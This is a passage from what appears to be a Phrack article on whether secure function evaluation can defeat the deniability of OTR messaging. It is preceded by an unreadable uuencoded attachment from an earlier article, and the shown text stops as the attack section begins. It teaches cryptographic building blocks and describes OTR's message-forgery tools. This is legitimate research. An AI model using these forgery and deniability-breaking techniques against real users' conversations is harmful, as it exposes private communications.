M]E:#CR[K)_^+NYOG[:"+B4\F>O/)1*/;`Z_9"[KD\DTG&Q(S&&;]*)?*G.2\ MN?<<;K6AL6+IJ)HW]'(O30QV/MRO'O6*EU.209HHLMQ\*I6>2)T.68R*_/X MPT64.(Q-?ZYG;!92XM@:04%D$:6.:*F:4?10V>VD6JE#-<4.7(`RE.EZJ/,& M1U$]J&KFU8!2S&E;S-P_*2I(U&*J*L9%50F55@T451:!525/:U6MJY*5PGHK M1U?E;17#KI/V*JRY\BM5Z+":2)9Y4]]H2ST_Z5G=Y,S]*,7.'V?NS9ZYC='F M:JF)T4Z]40#<'ZQ?T+P6F+QB= MIR,P,];7G5#2R,%.)V M;#)&K,<1`853.W2"8?I5F]/>"F4'A+OFXS1B-:EZH(8):2$O<8Z0:`#-QSDI MH+"00#`FW60*"5(3S!"876C+"+,T(?,).`2I(B80M1BD6_GB"[8YTBU%=RD8 M[R_.97_8,@E+ZFT@\9.[U"88H6Y-P+*ZCHT-1UKR(ZR*>,8!Q%+7XUBFHK6N M'8N-6,<>N^Z`P['+/MUX=>@P=[PVA0=QRK\T&GMM&#)JEEU"TZD,UW`3\]`A MP6YB'K7AQ3[Q/&P8G*J90#R9AA.9$U.'VJ5X.C<_D]&-3F7TF\YEN/UG2?S'=BLQM"F_`U'X^UZEM@/'-,`(G66@P($$P@K'@*H9P=(SY5BACZ,9X.^&AGE\)UF M0\P0/!GGE$X+FF^/HL%I-(HA-5"JI+X"U2N80-A+W07IB[FIHJJMV*21TJ9G M`E286UH-WGJ)";^PT27YNXQ9`.O-K)FI'1S5E'6,?&@:7!/&M&4,+;41$/#UXK:>D*-!A(< M@C.M*]EF.NK/`1%5O&(H6P,0U`-F_6P\--:5_?.LH/3:R.P*-S?.D5E8G(/& M:#^A0:=J$')O.8FVD\'I6&W%LV'6XR3+%]GT$G:&DB]P;T1CS+6.;9D]6=J' MN$D[3J8V5$,H0CS!%B!9%;@]*0D"98<3!9T`<]X0L9+N>9*+4/283V>[^(4P%4-?LF_P>%#63"`'M?^GY%D`8Z8,/J!.TXZ4+U MMW($[S8#$;9/4"5D-1HFGM1)M[A4^`2QGU!_8J1V#VP$:N,PS09)`=&X7@EK MP27&C6V_J[*I=FIA49G8P@GQ:B8Z3T#W0D.41[.\]JXF;+K1:(6GX0+2R'*WW!>!D=P?X^6T^%DJO@C(A-IG=NJ\#W6"Q@(AL@[;ZL:$I16[A4< MIC/R)T'*=*EI`NW%60Z_#?7R4]LL1(]-1BSA.9LN9_,WCGY&#:QX=K8E-)86 M%VR=H#.W"VW=PI@NE5[-,=VMY2"+^TI@.+>^^L[1W0:L5^AR@%TV3JJL41PE M87A7;/HW#2>>E8JCXF^X'3TM?V7/\D+![=\@=G7W-=86U^G?N]`0UP^EJPEQ MX7YBL*S"<66I,64198/(4J'!#T7M]TX"0)S-X"E>R_D0)2G;,>F62]:AE8=/ M`Y]-)@O/=?1=>;>R@/D]1;M>`%4^_N308[A/7`M7>/();2\]G%;3T]+&Z.&D#:ZR"^M#&6)EQY3?,*\ M&7T`'!0K,U.X.\";>^'!G_9/4W*&`JFF3UY+V@+.UH7)=2*V?=/'/A[Y*_6K M:E*;:9`N;T;>R>\\6%Z6D)U[N;7D6Z6$%W$I5#@)P^-&Q1--(A9( MUA+?M)22_Q9BR@+8[]6KEE0)*?CUYI;KW MH,22UXDL#4G%]89P3:$E;RJU-"$[LO2-""YY$\E%;^Q&$HPOP.2>!",(Y\=) M,*('WO.>]2::=I4F`9W"74E2H)Y6]8^6:`G2!,E.&@JSJ)#0)->;%+\4O>RG MC06P@/B57TMQ=ZT3TA/`Q-"U"(;;KBR#H5KVA@2PCSZ@EZ[+8"Q=%W9-SHOR M^.M.BL:BF+=&\X2QDBA&"]I(%KM)42SW9+&\)(SE0AIK;H9=EL8J%C,HCX66 M[K-(9(KVJKD!F_2L^UT7.+`_-?R`%=K]G](AQ![I=0>*L%YTUU=7OU[]>OWK MY/[WR7M%[P?IGS[JLZH^#Q\\@+]KC[Y:E7_AL[:^_N!/:VL/'SQZ]'#M@?J^ MNO9P7;V.5O_T&3ZS8IKD4?2G)#^=U)6;]_Y?]+/S_,7VMX?1XZUH^=5&M'S: M^B(Z3.%2?);WV$:Q-Q["[29Z5B1@=A$-U?;.+\'GX'T!I@*C*!TEQP.@`-]O MOWCQ:J?[_?:W*ZV=UZ]MZ[O\YO7!J]TW.T?[KU[:9ZJTZG=.\59+X>CC:)`= M:W1=*<8KJ_)!=SC%9ZV6A]'J^?AQY#Y`1J5>[W6Y63,_4#NZG_2W@AJ+E@\.C,>MI7RH`!#= M71FK_W$QX4_K3W]\/ML'Z7\VZ@UF_;18.?LD?O-G=.U3\P[]I,<][JIXSID1/BFD_&Z^ MJ8U>?J@:*S\$O63I*:B2_(>7Q7W@T0KO>0\>>L]F(T4X^][#D]YH2CW!TQ.8 M[/.#O;UGA[NR%-.VT<2M?2M7\[GU;X+#XKJ*Q\(&S7,)*GSY+[3_8=5ZGZZ/ M>?S?PXU5;_^O;3Q<_V/_?Y[]KS'='@*WY`;`'7T+@/I1^=""2)9HA MS--3>$8VQ8HI.+Z,:%^U-_"RYM]:P#[^6VL"S72I=+NG&(CH+D3RSGY.NTK@ MC/^M]=Z"?U\N=->`;=]\XV83A1=(+MG+35GD_SO!/=^B(ZH!$D MT^CVY,?1K4XTB;EP=M+^,S0-XE/QLQ*H>VXK6'BH9C\I#D9^HR$^JR-I#\&U7A?`75/CIWCT>0V#X MMU?6+R(8\UNL\B[>C+A9O^2/TUMZ7@T[U2.,%/A46=W%IGX*X,F*I.AEF5J1 M./KUUTC]QG[AMQDTU[^SS>AX]-0E(]N#Y9@LV'VPT>A#S4;'^U4-% M,X"E>KNQO/[5.V@ZBGBWW7H+[;_#>KRISL&\/"H&:3IIK\?8JB)FT!N1\&G> MFURVSSNF'WBU:?8>9>HFCP[*/LYS*K2W!;IW#G2PI$+,M7::3#2*='`"DZ2? M,<.S"X_;.`P^_]8ZZI]U'#X$AC7]Z5'`<9J>L+N(.KQ.DY^!0\_!'D(10S`< M/QF,/]#]JX+76AFRZJ#:E*"\/7M'Y1B2,"9U^JP)@#Z(:T>4G$P5O'3?^EXX MQTC@-(SUAL-8+PUCW1M&><'@8`"/W#9\47#O=1B8ZOOYVW?.,DPQU5$GRK!K M7@1%TJ=97Z%0UA=X@\F$-JBV'>;M(GK"U;"II]&3X]G)R5,<,G:X^@Y':<:Y M"K^N&'RP<4X@;OH=M73=Z1W`RUEO"D'4,0#"<1I-!@E<>('+P8J']'??:>"< MIM-T=-Z^]7S[/_=`;]8]NA73&M$,%1B3Z3AKXXC6:$1JCK`*8M8QX7.;Z]Q% M*(U/;!%N4__NY>#0W/[R'*`%\%IQ2]23^JYX$8*KU[0:Y-OL MG6[=:QAOY)T1_316ZVZ&LU"/6%5VY[8,;AUM?DQ4@<[D_YMJ*3S_3_O'8%RQ M?)+EBL1D4C&O4LV$T/CG!WXK2'X^+U/QF:S@J_"'K3\_4]S,*1G^X_^W&1C0: M(Q53?XOI>"+?K7OOHDE2%*+`Z_W7>\$B2;^_7%P.C\>#9;B[#^;/MPKWT11VTCX;=G:AZ3*03O@1=?1O_;=MN.00%B&\.+?/3D;L=1 MMYL4PVZWK02HZ<8M+(?M!I1<6L<%LK\H4U90D')'*)=I,3Z!9@#W_VPT3(KW M77-%-[G\C/M_[<'ZPZ_P_'^PL;;Q<`WV_X,U]>B/_?\9/M/\\C&%;1Z"^SYP M`ZWTHI=.IM$^/MG+\W'^V(I"T9VW'KJ\(W7-H,4[6!T9 MZUB);=13<5G`13`DSO0:;*LJ*SOCX5"Q`C%U?><.M?%V-XV^ORR4U)FI+G=5 M+W84;\]75S:2=RTL>#A)3L_2Z30C&X:3F9*QQB>*7YGE63'->@6&D&NC1P`$ MBCK->M%H-CQ.\V(%&WB>I@,UCQ3C,"M!(AF=#B!\`-8[!ELH"`'53X<0-NKX M$HS6AIQK=Y),>V>I:@<;`LFO#XE`QQ-R$C_QYTL2H`E1D$P?4\VSZ712/+Y_ M_U0!+"@;$9! M!I6_8)C643+RC`P)A^DTZ2?3!,->L*G:K`"/^8J/&$&:Y4B("RSZ!'*ABL8X7/:K%.DAZ%43#([K8SR<<0^@XFJQ9(485Q M7K3CMZOO!#B/9R?=Z;@[2!E8ZK>`ZA=$O73@--"E(?4JTF1T-KJCL*W'-T5` M&G6M*24Y-[]!>,K`FC57=")MKW:B03IJ0T^B*UWQUZVH/<[[\/IM]BX&/B>+ M[D9?QV(;D`I)E;83R4;GX_=Z$HH0='"@W>GT4O0!>Z"+N+X%(27:L43O+JR$ M,VXH:9^:QXKK4!V`7>,=5>V..P71T)IYD0Y$'6C5JR0[6K,=C8A,J(?`3,$R M3A*PPU9KWTW/DT'[#I>X$]N9V%70AY=I#JA-76/P7C;%1]T!F+,.4W'66?30 M,G$)`QE0ZAQ;F2BI$_-VP>S[2?XA&WGSEZ/;^,IY!=>-Y<)?$"==V>PW$6X`!N16 MAR=QR]EB0:I?N8[J1.H.$5>J5I)+++26ME6!ZL&^IQ2>J+Y[*K3P"$S;\P8Q M..6RW5$Q&$^+.A@B/V/+H-QG\D)419V5T[0W3;$7282($T7&#QE! MS3;"T51SD&MBZ`X)ROWDED.J%Z#ZN7ODBA.QB_8E@5?IJ5[-U5;I;1#IO6H_ M!@N$D(!F]U8MR@I,`+_HAG"1P/[&P_#&6-X8TYMCNS?1RBDA[L)Q6)Y1:#IV MI1JV.%)-%K7-F05N.D8H+\<80AF%M,'E;;RTV(17'\*`K M2LIIMZE.!\#;8:!TD";I18D_!KWP1J#Y'`*DA$QTOKB]NMY7OQ2DS'>6U9!N M1:L7MU=7'ERHQX)P@+`>W2X4WQ/><0SFCD'9#H/PQF8,;+=AR.$4QLQ0EMLN MK12)%I(P5LG2OLQ,X'!I):PN+*W:#+RX-$F8[L\Q$$B##26!H`M",',UQ32' MIN(.F-,Y!6&/<$&B$*X\1S+@"E[=DAEB6S?=B1[X^%UF+(#,!+%93T8/L%G? M9K3W%(>.`X@#)X*"UO6;_9J;+_5O<8PS:+>BX*C)`IB47.M#/:@M`([3>VRZ"V*YK?1LJYBU]UFE,1_ MSM(+.28D.KRL:FR=4N56@.0YNRN\([7J+L@6A69BMAP]^?%.`6C^F.8(18CD M!*:HIPW7)GT$YE,X&]*WN(6PW( M].V"`:)`X*]K3`#1;58PJ,&58*)FJ'WQ6&-:FD;R4=5*,.VS6\;K7(^SFZ%U MCH>.0/<>K`;(7@`"?!RITVFCCP`)C6G5Q7KH-:['BC6>0_RXR3+,'X0]]_R! MB#FW,Q`K^)APZ`3WJ5AW_UI`%?H"C''^N+J_X?N_FW'SO>[]_X,'&U_I^_\' MJVOK8/^[MO:'_\=G^>SL@(#2ZX&S+GR[=Z_U[>XS$EJBY7]&RZ,+<,TEQ]RM M:/EO:BNVW)_1\BD6?K4.^U.=S(K4`]=A6`YU>IXKDL-^Q/=G(_Z&=O(?H%)9 M0HS65]97-EHO=E]O'WVG>EHQ3NK+^`9L5EHOS#A>_*5-1>-H>6`OQKAEIV'% MY,*MS7-%KY\=[MY_SNI=&J2J$>C2]XN'4O5=6W]8&,0)S7Z2#?2UF>Y>]"<: M!2?L`UB8^[,BOU_D/9@M_-^[3SYVI26Q:Q`M[_^EK6K'Y"^]A-90B@B?J2,' MOZ,B![\E_9^2'JS#CRTJ=C8>I`4DJQF,L^DR>5:@;P!]5<7PU_EDRFW!&8J/ MS!?0#ZIRN@WUL]420W#&`V[1?VGO[,3",=IY#;[$1R9KRN] MR01;?/U:-NF\AR;M)/P&U7`?1]8;HCP\^\XT!#,V[F-5QUOS$%UL=19$!)*BQ]UK9GU=K#:;HS'8I.H@NA-66X-'[LE M-0K1]O*1D5='?Z]$1[,Z9B>*EM1/O?5:2R]VP9#H8/O@[UV@.5N6J3=DN#@6)!JH,[HD$5*$/A`CY_0H7XP=L7-ZC1< MFE9+T7B?Z-55_4M;G>6*)EVH1K2--ZZ56#=JM$2F%FV6J)6[.FZ4AQ[XKMQ= MP3\2V?AUDY-%EZTXQ_1K]P#C7^LKYV*S^46!B,NA__]&SD#^WQ+YW\3^=V/C M0YLWT&]"+/SQZ?Z\_\!#SD" %@`!P%P`` ` end --[ EOF ============== Page 11/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x0e of 0x13 |=-----------------------------------------------------------------------=| |=-----------=[ Secure Function Evaluation vs. Deniability ]=------------=| |=------------------=[ in OTR and similar protocols ]=-------------------=| |=-----------------------------------------------------------------------=| |=-----------------------=[ greg ]=----------------------=| |=-----------------------------------------------------------------------=| --[ Contents 1 - Introduction 1.1 - Prelude 2 - Preliminaries 2.1 - Diffie-Hellman 2.2 - RSA 2.3 - Oblivious Transfer 2.4 - Secure Function Evaluation 3 - OTR 4 - The Attack 4.1 - Sharing Diffie-Hellman Keys 4.2 - Generating MAC and Encryption Keys 4.3 - Sending and Receiving Messages 4.4 - The Final Protocol 4.5 - What's Left 5 - References 6 - Greetingz --[ 1 - Introduction Recent cryptographic primitives and protocols offer a wide range of features besides confidentiality and integrity. There are many protocols that have more advanced properties, such as forward secrecy, deniability or anonymity. In this article, we're going to have a deeper look at deniability in communication (e.g. messaging) protocols. One protocol that claims to offer deniability is OTR. Although our construction can probably be extended in a quite general way, we'll stick with OTR as an example protocol. Our goal is to show the limits of deniability, especially in protocols that offer message integrity features (as OTR does). We will do this by constructing a protocol that enables each partner in a conversation to cooperate with an observing party, such that he can prove the authenticity of any message that was part of the conversation to the observing party. ------[ 1.1 - Prelude It was one of these days sitting together with bruhns and discussing stuff (TM). Out of the sudden, he came up with the question: "You know, I'm asking myself what a trusted timestamping service could be good for...?". I told him "timestamps, most probably". He was like "Uhm, yes. And wouldn't that affect the deniability of OTR somehow?". We discussed the matter for quite a while and we finally agreed that a trusted timestamping service itself wouldn't be enough to destroy the deniability of OTR. But our interest remained... --[ 2 - Preliminaries In this section, we're going to give a quick overview of cryptographic primitives we're gonna use. If you're already familiar with those, you can happily skip our explanations and get to the real meat. The explanations in this section will not contain all the mathematical background (i.e. proofs ;) ), which is necessary to really *understand* what's going on. We'd rather like to provide a high-level overview of how all the individual components and how they can be combined. ------[ 2.1 - Symmetric Operations We'll keep this real short; you probably know the most common symmetric crypto algorithms. We will be using symmetric block ciphers (such as AES) and hash functions (SHA for instance). Also, we will need MAC functions in the following sections. You might already know HMAC, which is a MAC scheme based on hash functions. MACs (Message Authentication Codes) are used to protect the integrity of messages. Being a symmetric primitive, creating and verifying the MAC requires knowledge of the same key. If someone can verify a MAC, they can also create one. ------[ 2.1 - Diffie-Hellman The Diffie-Hellman scheme is one of the most widely used key establishment protocols today. The basic idea is the following: Alice and Bob want to securely establish a key over an insecure channel. Diffie-Hellman enables them to do this. During such a key-exchange both parties publicly send some values and after the communication is finished, both can compute a common key, which can *not* be computed by anyone who wiretaps the communication. --------[ 2.1.1 The Math behind it Alice and Bob agree on a prime p and some "generator" g. We won't discuss too many details of the mathematical background here (if you're interested in math, refer to [1]), so it's sufficient to say that in practice, g will often have the value 2 and the prime p will be large. In many cases, p and g are fixed parameters, on which both parties rely. Before describing the actual protocol, we want to show one interesting observation: Given some number x, it's trivial to compute values y = g^x mod p ("square and multiply" are the magic words). Given the value y however, it's not trivial at all to compute the value of x ("discrete logarithm problem", if you're interested). This property can be used to build a key-establishment scheme like this: A --------------- a = g^x mod p --------------> B A <-------------- b = g^y mod p --------------- B A picks a random x, computes a = g^x mod p and sends that value over to B. B picks a random y, computes b = g^y mod p and sends that value over to A. The values a and b are also referred to as Diffie-Hellman public keys. A now performs the following computation: (2.1.1) ka = b^x mod p B does the same and computes (2.1.2) kb = a^y mod p We can observe that due to the equation (2.1.3) ka = b^x mod p = (g^y)^x = g^(yx) = g^(xy) = (g^x)^y = a^y = kb ka and kb are equal. So A and B have established a common key k (k = ka = kb). As an attacker however neither knows x nor y, he cannot perform the same computation. The attacker could try to obtain x from a, but as we outlined above, this is (hopefully) computationally infeasible for large primes p and good generators g. In case of an active attacker, this scheme can be broken by a simple man-in-the-middle attack, where the attacker replaces Alice's and Bob's values by his own ones and then proxies the traffic between both parties. This problem can be fixed by making use of an authentication scheme: Alice and Bob need to "sign" the values that they transfer, so that the attacker cannot modify them without destroying the signature. There are many signature schemes out there (for instance based on RSA, which is described below) and all of them come with additional costs (you need to exchange public keys beforehand etc.). We assume you know about all the higher-level problems, such as key distribution, revocations, trust-models, etc. The basic principle of Diffie-Hellman however stays the same - and that is what we're going to focus on later in this article. ------[ 2.2 - RSA Another gem of modern cryptography is the RSA crypto system. RSA is also based on modular arithmetic, but it works in a different way than Diffie-Hellman. Alice wants Bob to send her an encrypted message. However, Alice and Bob have not exchanged any key material (if they had, Bob could just make use of any block-cipher like AES to send encrypted data to Alice). With RSA, Alice can send Bob a thing called her "public key". This public key can be used by Bob to encrypt messages. However, nobody can decrypt messages encrypted with Alice's public key without knowing another piece of information called Alice's "secret key". As the name suggests, Alice keeps her secret key secret. Therefore everybody can encrypt messages for Alice, but nobody besides Alice can decrypt these messages. --------[ 2.2.1 More Math Alice wants to receive messages from Bob, so she first needs to generate an RSA key-pair. Alice does the following: She picks two primes p and q and computes (2.2.1) N = p * q She picks a value e (in practice, e = 65537 is a common choice) and computes (2.2.2) d = e^-1 mod (p-1)(q-1) (i.e. e*d = 1 mod (p-1)(q-1)) This computation can be performed efficiently using the extended euclidean algorithm (but again, we won't dive into all the mathematical details too much). Alice keeps all the values besides N and e secret. A ---------------- N = p * q, e --------------> B A <--------------- c = m^e mod N --------------- B Alice now sends over N and e to Bob. Bob uses N and e to encrypt his message m as follows: (2.2.3) c = m^e mod N Then, Bob sends the ciphertext c over to Alice. Alice can use d to decrypt the ciphertext: (2.2.4) m = c^d mod N This works due to the way e and d are chosen in equation (2.2.2). To decrypt the ciphertext, an attacker could of course try to compute d. But computing d is hard without knowing p and q. And obtaining p and q from N is assumed to be an infeasible problem for large values of N. The tuple (N, e) is commonly called an RSA public key, whereas (N, d) is called private key. We can view an RSA instance (with fixed keys) as a set of two functions, f and f^-1, where f is the function that encrypts data using the public key and f^-1 is the function that decrypts data using the private key. We'll call such functions one-way functions. Instead of encrypting data with the receiver's public key, we can also use RSA as a signature scheme. The signer of a message first uses a hash function on his message. He then encrypts the hash value with his private key. This signature can be verified using the signer's public key: the verifier uses the public key to decrypt the hash value, computes the hash of the message he received and then compares the hashes. An attacker will not be able to produce such a signature, because he doesn't know the signer's private key. Please be aware that (like all the other algorithms described in this document), RSA should in practice not be used as described above. In particular, we did not describe how to correctly convert messages into numbers (RSA operates on natural numbers, remember?) and how to securely pad plaintexts. Depending on the respective security goals, there are a number of possible padding schemes (such as OAEP+), but we're not going to describe them here in detail. ------[ 2.3 - Oblivious Transfer Oblivious transfer is a real funny primitive. Suppose, Bob knows two values x0 and x1. Alice wants to obtain one of those values, but she doesn't want to tell Bob which value she wants. Now Bob could of course tell Alice both values (that way he wouldn't know, which one Alice was interested in). However, Bob wants to make some money and so he takes $1k per value. Poor Alice however only has $1k, so she can't afford to buy both values from Bob. This problem can be solved with an oblivious transfer. An oblivious transfer is a cryptographic protocol, so it requires a number of messages to be exchanged between Alice and Bob. After the messages are exchanged, Alice will receive the value she wanted and Bob won't know which value that was. --------[ 2.3.1 Math Voodoo There are a number of protocols for performing an oblivious transfer, based on different cryptographic assumptions. We are going to describe one classical example here, which can be implemented using a public-key cryptosystem (such as RSA). More details of this construction can be found in [7]. The system works like this: Bob picks one-way functions f, f^-1 and sends f over to Alice. Along with f, he sends two random values r0 and r1. You can think of f and f^-1 as RSA functions using fixed keys (as described above). A <---------------- f, r0, r1 -------------- B A ------------- z = f(k) XOR rb -----------> B Alice wants to receive value xb (b = 0 or 1) from Bob. She picks a random k, computes f(k) and XORs it with r0 if she wants to receive x0 or with r1 if she wants to receive x1. The XOR operation is sometimes also called "blinding". Depending on the cryptosystem that is used to obtain f and f^-1, there might be more appropriate choices then just using XOR. For RSA, it would be natural to use integer addition and subtraction (modulo N) instead of the XOR operation. Alice now sends the result z to Bob. Bob performs some computations: (2.3.1) k0 = f^-1(z XOR r0) (2.3.1) k1 = f^-1(z XOR r1) One of the k values will be Alice's, but Bob doesn't know which one. The other value will be junk, but it's important to note that this junk value cannot be computed by Alice (she doesn't know f^-1). Now Bob simply does the following: A <---------- x0 XOR k0, x1 XOR k1 --------- B Depending on which k value is the one that Alice actually knows, she can decrypt x0 or x1. And that's it: Alice now knows the value she wanted to receive and one junk value, which doesn't tell her anything. Bob however doesn't know which of the k values was the one that Alice picked, so he he cannot tell, which value Alice wanted to receive. Let's try it out: Say Bob hast two values x0 = 7 and x1 = 1. He is willing to share one with Alice. First he generates f and f^-1. To do that, he just uses RSA. He picks two prime numbers p = 5 and q = 11 and gets N = 55. Also, he picks e = 3 as encryption exponent (don't do that at home, kids!). The decryption exponent would then be d = 27 (you can compute that using the euclidean algorithm or alternatively you could just believe us). Bob now can send out (N, e) = (55, 3) to Alice, along with some random values (r0, r1) = (4, 9). Suppose Alice wants to retrieve the value of x1. First of all, she picks a random k, let's say k = 6. She encrypts it using the public key Bob sent (i.e. she applies Bob's one-way function): f(6) = 6^3 mod 55 = 51. She computes z = f(k) + r1 = 51 + 9 mod 55 = 5, which she sends to Bob. Bob now determines his candidates for k (i.e. k0 and k1) by computing: k0 = f^-1(z - r0) = (5 - 4)^27 mod 55 = 1 k1 = f^-1(z - r1) = (5 - 9)^27 mod 55 = 6 <-- Alice's k, but Bob doesn't know that Bob then sends to Alice: x0 + k0 = 7 + 1 and x1 + k1 = 1 + 6. Alice receives the two values 8 and 7. She knows that Bob's second value was x1 + k. As she is interested in x1, she takes that value and computes x1 = (x1 + k1) - k = 7 - 6 = 1 (observe that k = k1, which only Alice knows). Now Alice could try to cheat and to also obtain x0. But to do that, she would need to know the value that Bob computed for k0, which she won't be able to compute without knowing f^-1 (i.e. the secret exponent d in our case). ------[ 2.4 - Secure Function Evaluation Secure function evaluation is another real gem of modern cryptography. A classical example is the 0day problem. Two hackers A and B have a certain number of 0day exploits each. They want to determine who is more elite, but they are so paranoid that they don't even want the other to know how many 0days they have. So, A knows some number x, B knows y and both want to compute the function f(x, y) = { 1 if x > y, -1 if y > x and 0 otherwise}. Secure Function Evaluation solves this problem. Again, both parties exchange a number of messages and after this is done, both of them know the result of the function without having learned anything about the input of the other party. And instead of the function shown above, they could just arbitrarily agree on any function to be evaluated. One interesting practical application of SFE is to perform mutual authentication based on a shared secret. Two parties knowing a shared secret can jointly compute the function f(x, y) = {1 if x = y, 0 otherwise}. Interestingly, the OTR protocol makes use of such a SFE scheme for authentication. --------[ 2.4.1 More Voodoo Suppose there is a function f(x, y), which two parties want to compute (this is actually secure two-party computation, which is not the most general case - for our purpose however it is sufficient). Both want to share the result and both want to keep their own inputs safe. There are several constructions that allow us to perform SFE. We'll discuss only one of them here: Yao's garbled circuits [3]. As the name suggests, the function to be evaluated by both parties first has to be transformed to a boolean circuit. For many functions, this is generally not a problem. The next step is to "garble" the circuit. The main idea behind this garbling process is that we want everyone to be able to evaluate the circuit, while nobody should see what he actually evaluates. Therefore, we will try to hide all the bits that "flow" through the circuit. For hiding the bits, we could make use of a block cipher. However, we have to take care that the circuit can still be evaluated! Therefore, we will also have to modify all the gates in the circuit somehow, so that they are able to work with "garbled" inputs. Now one could imagine that such a modification is a hard task. Fortunately, there's a simple trick: All the gates in our circuit are very small boolean functions (by small we mean that they don't have many inputs). We can therefore replace every gate by its truth table. The truth table simply maps the input bits to the respective output bits. For a simple NAND gate, the truth table would look like this: \a| b\| 1 0 --+---- 1 | 0 1 0 | 1 1 Now that we have replaced every gate by its truth table, we will just have to modify the truth tables, so that they reflect the fact that all the bit values are garbled. The trick here is the following: Instead of the real values of the input bits (1 or 0), we pick random cryptographic keys (say 128 bits long). We will then use those keys to encrypt the values in the truth table. Instead of the input values for the gate, we will then use the random keys (i.e. instead of 1 or 0, we just pick two random bitstrings per wire). As an example, consider a NAND gate again. We choose four keys ka0, ka1, kb0 and kb1. Those are the keys for the respective input values of the gate (i.e. a=0, a=1, b=0, b=1). Also, we pick an encryption function E and a decryption function D. For simplicity, we assume that if a wrong key is supplied to D, it will signal this (e.g. return an error code) instead of providing a junk plaintext. We now perform the following transformation on the truth table of our gate: \a| \ a| b\| 1 0 b \ | 1 0 --+----- -----> ---------+-------------------------------- 1 | 0 1 1 | E_ka1(E_kb1(0)) E_ka0(E_kb1(1)) 0 | 1 1 0 | E_ka1(E_kb0(1)) E_ka0(E_kb0(1)) The elements in the truth table are double encrypted using the two keys that belong to the values of a or b, respectively. When evaluating the circuit, you only know the keys that correspond to the correct input values (so for example you know ka0 and kb1 but no other key). By simply trying to decrypt every value in the table, it is easy to find the according output value (only one decryption will succeed). The next question would then be: How to garble a whole circuit? It's not much different. Assume that two gates are connected like this: Out | +------+ | G1 | +------+ | | +---+ In_3 |G2 | +---+ | \ In_1 In_2 We have inputs In_1, In_2, In_3 and one output value Out. G2's output is connected to one of the input wires of G1. In the truth table of G2, we therefore put the *key* that corresponds to the respective input value of G1 (so instead of double-encrypting G2's output value 1 or 0, we double-encrypt the respective key for one of G1's input pins). The gate G1 can be garbled as described above. The keys for the input wires In_1, In_2 and In_3 are assumed to be already known by the party evaluating the circuit. G2 can now easily be evaluated and yields the missing key for evaluating the gate G1. However, during the evaluation of the circuit, no intermediate values (like the real output of G2) are disclosed to the evaluating party. Let's try that in practice: Say Alice and Bob want to evaluate a function. The following protocol can be used: A prepares a garbled circuit and hard-codes her input values into the circuit. She sends the result to B. B now needs to retrieve the keys for his input values from A. But beware of two limitations here: 1) B doesn't want to disclose his input values to A (obviously). 2) A doesn't want to tell B the keys for both input values, because then B would be able to reverse-engineer the circuit and to obtain A's input values. You've probably already seen the solution: B uses an oblivious transfer to obtain the keys for his input values from A. For every bit b of his input values, Bob will obliviously obtain the correct key k_b0 or k_b1 like this: A ---------------- f, r0, r1 --------------> B A <------------- z = f(k) XOR rb ----------- B A -------- k_b0 XOR k0, k_b1 XOR k1 -------> B B is now able to evaluate the whole circuit. Depending on how A built the circuit, the output truth tables could contain real or garbled values. Using some simple tricks, we can even split the output between A and B (so that A gets some part of the result and B gets another part). We'll detail on that later. Now there are some problems when one party isn't honest. Alice for instance could just prepare a malicious circuit that leaks information about Bob's secret inputs. There are ways to prevent such attacks ("cut and choose", zero knowledge proofs, etc), but we won't provide the details here. A more detailed description (along with a security proof) can be found in [3]. --[ 3 - OTR For those who are not familiar with the OTR protocol, this section might provide some help. OTR features a number of cryptographic properties, including confidentiality, integrity, forward secrecy and deniability. There are two major phases of the protocol: initial key exchange and message exchange. The initial key exchange is based on the Diffie-Hellman protocol. It is referred to as AKE (Authenticated Key Exchange). To defend against active attackers, a public-key signature scheme (DSA in this particular case) is used. The DSA master keys have to be exchanged beforehand (OTR also offers to authenticate DSA keys using the SMP protocol, but that's not interesting in our case). All the cryptographic details are provided in [2]; it's not particularly helpful to repeat them here. Keeping in mind that OTR's key exchange is based on Diffie-Hellman combined with some symmetric crypto and a signature scheme will suffice. After the key-exchange phase, each party will have a number of symmetric keys for encryption and authentication. Those are derived from the Diffie-Hellman master key by hashing it in various ways (encryption and MAC key will obviously be different). The messages are encrypted using AES in CTR mode, and each message is MACed using the symmetric key material. That offers us confidentiality and integrity. It's important to note that *only* symmetric keys are used for the actual payload crypto. The DSA master keys are only used in the initial key-exchange phase. The next feature we're going to look at is forward secrecy. Forward secrecy means that even if the (DSA) key of a participant is disclosed, past conversations cannot be compromised. Forward secrecy in OTR is established by the Diffie-Hellman protocol: after a conversation ends, both parties can safely wipe the Diffie-Hellman key that they generated. There is no way for an attacker (and not even for the conversation partners) to re-compute that key afterwards: to do that, one would either need to know the private exponent of one party (which is of course also wiped from memory) or one would need to derive the key from the public information exchanged between both parties, which is infeasible (hopefully; that's what Diffie-Hellman relies on in the first place). Having understood how OTR provides forward secrecy, we can move on to deniability. During the conversation, both parties can be sure that the messages they receive are authentic and not modified by an attacker. It is immediately clear that the message authenticity can not be verified without the MAC key. If one of the conversation partners wants to convince a third party that a message is authentic, this conversation partner implicitly proofs his knowledge of the MAC key to the third party. But then again, the third party can not be sure that the conversation partner didn't fake the message (he can do this as he knows the MAC key). This is what we call weak deniability [4]. Obviously, OTR offers weak deniability, as message authentication is performed using only symmetric primitives. But OTR offers even more: In every message, the sending party includes a new Diffie-Hellman key exchange proposal. The proposal is also covered by the MAC to rule out MITM attacks. So both parties frequently generate new key material. And this lets us do a nice trick: as soon as they generate new MAC keys they publicly disclose the old MAC keys. The old keys aren't used anymore, so this is safe. But as the MAC keys are public, *everybody* could create fake messages and compute proper MACs for those. This is what we call strong deniability. OTR ships with a toolkit containing software for actually forging messages. Depending on how much you already know (only the MAC keys, MAC and encryption keys, MAC keys and some message plaintext), you can use different tools to forge messages. If you know parts of the plaintext and the MAC keys, you can exploit the fact that AES is used in CTR mode to directly modify the known parts of the plaintext. If there is no known plaintext, the otr_remac tool might helpful: Every message contains a new Diffie-Hellman key exchange proposal in plaintext (but covered by the MAC). Now you can simply replace that proposal by one that you generated (e.g. using the otr_sesskeys tool) and compute a new MAC for the packet. That allows you to easily fake the rest of the conversation: You know your own private Diffie-Hellman key, so you can generate a plausible set of MAC and encryption keys and just use that one. It will look legitimate because the modified packet (containing your key exchange data) still has a valid MAC. --[ 4 - The Attack The deniability of OTR stems from the fact that a third party does not know whether a message has been sent during a conversation (and before the MAC keys were disclosed) or was generated afterwards (when the MAC keys were public). An obvious way to attack OTR's deniability would therefore be to just monitor all the OTR traffic between A and B. If one party now decides to disclose the MAC and encryption keys used for a particular message, the authenticity of that message can be verified. And as the message has been recorded during the conversation (i.e. before the 